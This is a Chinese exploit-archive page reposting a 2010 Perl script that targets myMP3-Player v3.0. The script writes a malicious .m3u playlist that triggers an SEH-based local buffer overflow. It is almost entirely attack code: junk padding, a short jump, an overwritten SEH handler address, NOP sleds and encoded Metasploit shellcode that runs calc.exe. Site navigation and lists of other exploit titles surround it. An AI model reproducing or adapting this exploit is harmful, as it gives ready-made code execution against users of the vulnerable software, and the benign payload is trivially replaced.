首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
myMP3-Player v3.0 (.m3u) Local Buffer Overflow Exploit (SEH)
来源:vfocus.net 作者:n3w7u 发布时间:2010-03-19  

#!/usr/bin/perl

# Title: myMP3-Player v3.0 (.m3u) Local Buffer Overflow Exploit (SEH)
# Date: 18.03.2010
# Author: n3w7u
# Software Link: http://www.chip.de/downloads/myMP3-Player-3.0_13008621.html
# Version: 3.0 and the other version can't be download from serious Page, and don't be free.
# Tested on: Windows XP SP3 (ger)


#[ Buffer ][ Short Jump ][ P/P/R ][ NOP ][ Shellcode ][ NOP ]

my $file= "evil.m3u";
my $junk ="\x41" x 1040; # for myMp3 Player 5/cracked junk =1056
my $jmp="\xEB\x08\x90\x90"; # jmp short
my $seh="\x25\x12\xC8\x72"; #72 C8 12 25 msacm32.drv
my $nop ="\x90" x 20;
my $nops ="\x90" x 10;

# windows/exec - 224 bytes
# http://www.metasploit.com
# Encoder: x86/call4_dword_xor
# EXITFUNC=process, CMD=calc.exe
my $buf =
"\x2b\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" .
"\x0e\xa8\x6e\x77\xce\x83\xee\xfc\xe2\xf4\x54\x86\xfe\xce" .
"\xa8\x6e\x17\x47\x4d\x5f\xa5\xaa\x23\x3c\x47\x45\xfa\x62" .
"\xfc\x9c\xbc\xe5\x05\xe6\xa7\xd9\x3d\xe8\x99\x91\x46\x0e" .
"\x04\x52\x16\xb2\xaa\x42\x57\x0f\x67\x63\x76\x09\x4a\x9e" .
"\x25\x99\x23\x3c\x67\x45\xea\x52\x76\x1e\x23\x2e\x0f\x4b" .
"\x68\x1a\x3d\xcf\x78\x3e\xfc\x86\xb0\xe5\x2f\xee\xa9\xbd" .
"\x94\xf2\xe1\xe5\x43\x45\xa9\xb8\x46\x31\x99\xae\xdb\x0f" .
"\x67\x63\x76\x09\x90\x8e\x02\x3a\xab\x13\x8f\xf5\xd5\x4a" .
"\x02\x2c\xf0\xe5\x2f\xea\xa9\xbd\x11\x45\xa4\x25\xfc\x96" .
"\xb4\x6f\xa4\x45\xac\xe5\x76\x1e\x21\x2a\x53\xea\xf3\x35" .
"\x16\x97\xf2\x3f\x88\x2e\xf0\x31\x2d\x45\xba\x85\xf1\x93" .
"\xc2\x6f\xfa\x4b\x11\x6e\x77\xce\xf8\x06\x46\x45\xc7\xe9" .
"\x88\x1b\x13\x9e\xc2\x6c\xfe\x06\xd1\x5b\x15\xf3\x88\x1b" .
"\x94\x68\x0b\xc4\x28\x95\x97\xbb\xad\xd5\x30\xdd\xda\x01" .
"\x1d\xce\xfb\x91\xa2\xad\xc9\x02\x14\xe0\xcd\x16\x12\xce";

open($File,">$file");
print $File $junk.$jmp.$seh.$nop.$buf.$nops;
close($File);


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Energizer DUO USB Battery Char
·mplayer <= 4.4.1 NULL pointer
·myMP3-Player v3.0 (.m3u) Local
·Win32 Mini HardCode WinExec&Ex
·MediaCoder (.lst) file local B
·VariCAD 2010-2.05 EN Local buf
·ZippHo 3.0.6 (.zip) 0day stack
·Adobe Reader PDF LibTiff Integ
·Httpdx v1.5.3 Remote Break Ser
·Virtual PC Hypervisor Memory P
·Xilisoft Video Converter(.yuv
·Windisc version 1.3 Stack Buff
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved